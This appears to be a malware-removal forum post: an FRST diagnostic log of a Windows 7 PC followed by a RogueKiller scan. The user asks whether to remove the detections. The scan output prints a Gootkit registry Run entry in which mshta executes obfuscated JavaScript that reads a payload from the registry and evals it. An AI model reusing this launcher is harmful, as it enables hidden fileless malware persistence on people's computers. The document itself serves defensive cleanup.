Task: {5D9ADB66-F56E-4896-87B0-D5E59E13B2DB} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-08-21] (Piriform Ltd)
Task: {6EB435D2-BA79-44AE-B40D-A5E4C18440CE} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2014-10-29] ()
Task: {729C2EA9-0D4D-4616-AAC2-0744E1C96EAE} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2014-10-27] (RealNetworks, Inc.)
Task: {7549ECE8-0A73-40E6-90B2-D33CDA083404} - System32\Tasks\SafeZone scheduled Autoupdate 1462303413 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-04-15] (Avast Software)
Task: {8C0A9A69-B02A-4A69-AB1D-AE566E0044E7} - System32\Tasks\{F1349365-EEF0-4FFD-83DC-DD80BFB66B89} => pcalua.exe -a C:\Users\kathy\Desktop\Install_LiveX.exe -d C:\Users\kathy\Desktop
Task: {8C3F1A35-D8C6-4C2E-AB0A-CE9CA221ADCE} - System32\Tasks\{509E5DCA-AED4-4CEE-B17E-F6DB33AADABF} => D:\SETUP.EXE
Task: {8C6895D3-0BF3-4933-847A-5DA5C3B42109} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-07] (Adobe Systems Incorporated)
Task: {90D24CA1-50FD-46D8-8092-0F0F32B01C50} - System32\Tasks\{D85C3585-91EC-4139-B53D-C93D0010DB51} => C:\Users\kathy\Desktop\Diablo-III-8370-enUS-Installer-downloader.exe
Task: {9AE39EB9-7225-4E00-9620-61DD7D4FD1C9} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {AC92EB93-1188-4506-B4D0-FF3E85A808A3} - System32\Tasks\{82BB1A52-8E3C-4D41-8631-85D01ADC3B3E} => Firefox.exe
Task: {AEECD1B0-A900-4D42-95E5-F48AA4734BEF} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {BAF9CB05-05CF-4AC2-B209-35D80AC576B3} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => C:\Program Files\Microsoft IntelliPoint\IPoint.exe [2009-11-05] (Microsoft Corporation)
Task: {BB60938F-830C-4FDF-847F-F64888B3739B} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2014-10-27] (RealNetworks, Inc.)
Task: {BDA7DC91-A88B-4DBA-8865-D59E05C4219E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {C7209D06-51D5-4119-9F5C-9816E557649E} - System32\Tasks\Microsoft_Hardware_Launch_IType_exe => c:\Program Files\Microsoft IntelliType Pro\IType.exe [2011-04-13] (Microsoft Corporation)
Task: {C7A0D40B-9969-4E55-A0A3-A2B2CF7334D0} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-03-04] (AVAST Software)
Task: {D205FCEE-A6B4-4A6A-B7D3-78B76CA711E9} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {DBAE8D00-D6B8-4ACE-8E93-514AC8319D74} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {F3567804-1232-4C68-83E3-711163422A7B} - System32\Tasks\{D4F55AB1-8DE8-477A-87D1-311CF50DD790} => \KATHY-PC\Users\kathy\Diablo-III-8370-enUS-Installer\Diablo III Setup.exe
Task: {F49367A9-DFA5-4AF1-897D-8B4052C24854} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk -> C:\Users\kathy\AppData\Local\fb05b4\fe8e31.bat ()

==================== Loaded Modules (Whitelisted) ==============

2015-10-27 06:26 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-18 19:47 - 2015-10-13 05:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2014-10-26 23:59 - 2014-10-26 23:59 - 00039568 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-10-30 06:41 - 2014-10-30 06:41 - 00031856 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2014-10-29 20:06 - 2014-10-29 20:06 - 00560192 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
2016-05-03 08:32 - 2016-05-03 08:32 - 00123344 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-05-03 08:32 - 2016-05-03 08:32 - 00135816 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-05-03 11:27 - 2016-05-03 11:27 - 02891264 _____ () C:\Program Files\AVAST Software\Avast\defs\16050301\algo.dll
2016-05-03 08:32 - 2016-05-03 08:32 - 00479680 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2014-05-11 06:54 - 2015-02-18 22:05 - 00865880 _____ () c:\program files (x86)\real\realplayer\RPDS\Plugins\cldplin.dll
2015-10-27 06:26 - 2015-09-01 07:25 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2014-10-30 06:41 - 2014-10-30 06:41 - 00035976 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2014-10-30 06:41 - 2014-10-30 06:41 - 00039560 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2014-10-30 06:41 - 2014-10-30 06:41 - 00032888 _____ () C:\Program Files (x86)\Real\UpdateService\RPDSUpdatePlugin.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01040656 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00237328 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2016-01-07 19:25 - 2016-01-07 19:25 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2014-10-29 20:01 - 2014-10-29 20:01 - 01382048 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\cpprest100_1_2.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:430C6D84 [127]
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 [284]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\plsapp => ""="service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2015-09-09 18:07 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\kathy\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: ose => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk => C:\Windows\pss\Secunia PSI Tray.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AMD AVT => Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: EvtMgr6 => C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
MSCONFIG\startupreg: Google Update => "C:\Users\kathy\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: iCloudServices => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
MSCONFIG\startupreg: IntelliPoint => "C:\Program Files\Microsoft IntelliPoint\ipoint.exe"
MSCONFIG\startupreg: ISTray => "C:\Program Files (x86)\PC Tools\PC Tools Security\pctsGui.exe" /hideGUI
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: itype => "c:\Program Files\Microsoft IntelliType Pro\itype.exe"
MSCONFIG\startupreg: JMB36X IDE Setup => C:\Windows\RaidTool\xInsIDE.exe
MSCONFIG\startupreg: Launch LGDCore => "C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe" /SHOWHIDE
MSCONFIG\startupreg: Launch LgDeviceAgent => "C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe"
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: MobileDocuments => C:\Program Files (x86)\Common Files\Apple\Internet Services\ubd.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{806F3C11-6F75-447F-9EA4-9859453637B9}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{702D8959-1637-4658-91D4-F73E7C44B0A4}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{C82D830F-6889-483E-9BB8-57F2C59F17AE}] => (Allow) svchost.exe
FirewallRules: [{DB409C55-9F87-40AD-9F89-0E66BBE92147}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [TCP Query User{15CB89E7-D9B6-4EDF-9A46-EC69D93C0EF2}C:\program files (x86)\ventsrv\ventrilo_srv.exe] => (Allow) C:\program files (x86)\ventsrv\ventrilo_srv.exe
FirewallRules: [UDP Query User{008A6BCF-B7A2-4466-8AF8-ADCB80564557}C:\program files (x86)\ventsrv\ventrilo_srv.exe] => (Allow) C:\program files (x86)\ventsrv\ventrilo_srv.exe
FirewallRules: [{45BB01A2-570F-4C78-B467-DE3A8DE35372}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{802E0A51-E2BE-4EDD-8DF7-26A1A42E5CED}] => (Allow) C:\Program Files (x86)\Ventrilo\Ventrilo.exe
FirewallRules: [{4A4C3BDE-11D3-470E-8085-45671BCF9972}] => (Allow) C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\USBSetup.exe
FirewallRules: [{7A4288F4-6C37-4455-AF7B-B91DAF8D399C}] => (Allow) C:\Program Files\HP\HP Deskjet 1050 J410 series\Bin\USBSetup.exe
FirewallRules: [{F7BD0B6A-9437-4542-89E1-E7D16DBEF127}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A5C265EF-7356-445B-ABBB-E6AC3051EE62}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{127DD0A4-19E9-44DA-813C-4F268679E633}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DFD31849-6BD6-46C2-9D02-2E731F9EFB36}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5E3CDC62-52A9-41F7-A831-43B35B9DFC8A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D7D47563-8EDF-4AFF-BCE2-1CBCC8C1FDC7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5F2B5AD6-7313-4EB3-B8F6-D5221C16A4F3}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FF6439A9-1942-4AFA-9C54-1CBF4D22C7BF}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4EDC91C7-C2FD-4DB3-A1D1-4F59536506E2}] => (Allow) LPort=3724
FirewallRules: [{14EC9744-BFD0-42CA-A786-5FCAE0582857}] => (Allow) LPort=1119
FirewallRules: [{DB1F0E42-FEBB-43CD-8896-F01BBC372821}] => (Allow) LPort=1120
FirewallRules: [{7DC5CBF6-4F7E-47A8-9EF6-1B527297DEA5}] => (Allow) LPort=4000
FirewallRules: [{10962630-EDBC-4B5B-A0B0-BAD1BC9ED10B}] => (Allow) LPort=6113
FirewallRules: [{7395515B-C7E9-4A88-BE24-01453631D8FB}] => (Allow) LPort=6114
FirewallRules: [{7CA9A711-AD5A-438D-A3FB-F5D93E0434E4}] => (Allow) LPort=443
FirewallRules: [{0406B5BD-6254-48EC-AD34-1E1AE004760B}] => (Allow) LPort=3074
FirewallRules: [{A40A9973-5DCC-49B2-A3A3-E50EB0993F65}] => (Allow) LPort=5223
FirewallRules: [{93D85615-536B-490D-A18F-37B5F5605508}] => (Allow) LPort=4433
FirewallRules: [TCP Query User{32015787-21B8-4EA4-BED8-CFB4B054310D}C:\program files (x86)\diablo iii\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [UDP Query User{FB8D0144-653F-4B53-99C1-B661B930121F}C:\program files (x86)\diablo iii\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [TCP Query User{F994674E-2FFB-4EBE-A780-44D61573DF57}C:\program files (x86)\diablo iii\diablo iii.exe] => (Block) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [UDP Query User{DE0F8841-61AB-4180-8D41-18FCBC6AA670}C:\program files (x86)\diablo iii\diablo iii.exe] => (Block) C:\program files (x86)\diablo iii\diablo iii.exe
FirewallRules: [{42CA28DE-5285-4733-AC1F-9DFD9661B6B8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F78974D6-E528-4087-9B4C-D204797BDCBB}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{2AA758D6-C1E0-4278-9DB2-9258500466AB}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{F6077656-A1E0-4AC7-A4B3-9336679349A8}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{31338F44-7581-48FD-97E4-082661EA27F1}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{343475D0-7374-455A-8FD5-3FE2AF6305C0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{BF4A15C9-E5C1-4C4B-8C36-C8B673340D87}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{9C144172-CED3-4146-8EB3-AA32571B3F4E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2DDF25DF-8E98-45FF-A27E-CD2AE1757529}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [TCP Query User{69C66612-D67F-4632-B305-2CD6B3509120}C:\program files (x86)\diablo iii public test\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii public test\diablo iii.exe
FirewallRules: [UDP Query User{48C21F4B-8717-4696-A0D8-25B572C4183D}C:\program files (x86)\diablo iii public test\diablo iii.exe] => (Allow) C:\program files (x86)\diablo iii public test\diablo iii.exe
FirewallRules: [{8B6A1E59-CD0C-4FF6-9961-48CC21485E9B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7F54D2D8-29E3-496F-A62C-C46DEF313417}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{3101E754-58BE-459C-A32D-0637E93406EB}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{22AC46FC-B7AB-4B68-97D5-B4709674D3B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2B812C14-C393-49E0-916F-3AC360A749ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D50835DF-14C2-4448-A015-0CE6E13B6474}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6FC68589-758D-4977-B468-E3B792DA95A2}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{7B53F517-8A2C-40F9-B0C1-70431873625D}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{2D76B4FB-0647-4057-8451-D27A3C29CC8B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{A5BBE726-F6C8-459E-AD9B-84533A5010C4}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{41D1C9A1-BC58-4F04-B0BF-6EC55DC260CB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{9D254BF8-ABA9-4CAD-A663-06DB5A069323}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

17-04-2016 19:00:15 Windows Backup
24-04-2016 19:00:06 Windows Backup
01-05-2016 19:00:08 Windows Backup
03-05-2016 06:22:26 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (05/03/2016 02:24:02 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (05/03/2016 06:16:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (05/02/2016 09:19:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BitDefenderCom.exe, version: 1.0.1.0, time stamp: 0x56dae712
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000090000000
Faulting process id: 0x2d2c
Faulting application start time: 0xBitDefenderCom.exe0
Faulting application path: BitDefenderCom.exe1
Faulting module path: BitDefenderCom.exe2
Report Id: BitDefenderCom.exe3

Error: (04/30/2016 04:08:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0310ef48
Faulting process id: 0xb68
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/30/2016 04:08:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/30/2016 04:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0310ef48
Faulting process id: 0x%9
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/30/2016 04:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x030aef48
Faulting process id: 0x%9
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/30/2016 04:07:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc414
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0310ef48
Faulting process id: 0x%9
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (04/29/2016 11:31:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/27/2016 06:06:29 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The iPod Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Secunia Update Agent service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Secunia PSI Agent service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The RealPlayer Update Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The RealPlayer Cloud Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The RealNetworks Downloader Resolver Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:13 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMScheduler service terminated unexpectedly.  It has done this 1 time(s).

Error: (05/03/2016 02:21:12 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 35%
Total physical RAM: 8173.43 MB
Available physical RAM: 5251.06 MB
Total Virtual: 16345.07 MB
Available Virtual: 13015.95 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:800.84 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4292DBF1)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

Here is the new RogueKiller…..but we never took action on the five infections that it found last time,  was waiting for  you to tell me what to do  it shows 8 now  so i just check remove selected then?

 

RogueKiller V12.1.5.0 [May  2 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : kathy [Administrator]
Started from : C:\Users\kathy\Desktop\RogueKiller.exe
Mode : Scan – Date : 05/03/2016 19:44:00

¤¤¤ Processes : 3 ¤¤¤
[Proc.Injected] firefox.exe(5192) – C:\Program Files (x86)\Mozilla Firefox\firefox.exe[x] -> Found
[Proc.Injected|Proc.RunPE] regsvr32.exe(2292) – C:\Windows\SysWOW64\regsvr32.exe[x] -> Found
[Proc.Injected|Proc.RunPE] regsvr32.exe(2432) – C:\Windows\SysWOW64\regsvr32.exe[x] -> Found

¤¤¤ Registry : 4 ¤¤¤
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | 2f892c0f : mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; [x][x] -> Found
